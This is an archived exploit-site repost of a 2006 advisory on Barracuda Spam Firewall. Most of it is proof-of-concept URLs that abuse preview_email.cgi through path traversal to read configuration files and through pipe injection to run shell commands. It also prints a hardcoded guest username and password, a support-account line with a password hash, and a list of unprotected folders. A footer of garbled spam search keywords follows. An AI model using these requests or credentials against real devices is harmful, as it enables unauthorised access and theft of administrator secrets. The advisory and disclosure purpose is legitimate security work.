about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Barracuda Spam Firewall <= 3.3.03.053 Remote Code Execution (extra)




2006-08-07 Barracuda Spam Firewall <= 3.3.03.053 Remote Code Execution (extra)
Rated as : High Risk

Title: Barracuda Arbitrary File Disclosure + Command Execution
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to
3.3.03.053
Discovered by: Greg Sinclair
Credits: Matthew Hall
Update: 07 August 2006
Updated by: PATz
 
####################################################################
 
Proof of Concept:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
 
 
####################################################################
 
#using |unix| for command execution:
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|

#admin login/pass vuln
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
 
eg.

#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99
2>&1`;
login: guest pass: phteam99

some folder are accessible via http without permission
https://<deviceIP>/Translators/
https://<deviceIP>/images/
https://<deviceIP>/locale
https://<deviceIP>/plugins
https://<deviceIP>/help
 
#stuff in do_install
 
/usr/sbin/useradd support -s
/home/emailswitch/code/firmware/current/bin/request_support.pl -p
swUpHFjf1MUiM
 
## Create backup tmp dir

/bin/mkdir -p /mail/tmp/backup/
chmod -R 777 /mail/tmp/
 
## Create smb backup mount point
/bin/mkdir -p /mnt/smb/
chmod 777 /mnt/smb/
 
.................................
Greetz to all noypi and phteam ^^,
.............eof.................
securitydot.net - 2006-08-07

Advertising

Copyright 2007, SecurityDot
Mon, 07 Dec 2009 12:48:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t315t news for c www.dirl.n CMS is Fre CMS is Fre thirisha b cracker ja www.gamezo CMS is Fre Crack Data Crack Data WWW.XXL.FR Crack Data www.womens postmail www.Xxxsex jendeh www.womens My_eGaller c99.php?ac vBulletin Crack Data CMS is Fre wordpress xpl/exploi wordpress Hotsweet Perfect ma mod_ssl 2. CMS is Fre php 4.2.0 CMS is Fre wordpress www.idgbbs CMS is Fre dina+and+h My_eGaller a call gir php nuke 7 Crack 1ce1 Mntharsex www.amshop rin 0 www.4g999. video sex news for c www.bootyt Simple Inv Crack+Data htp://ww8.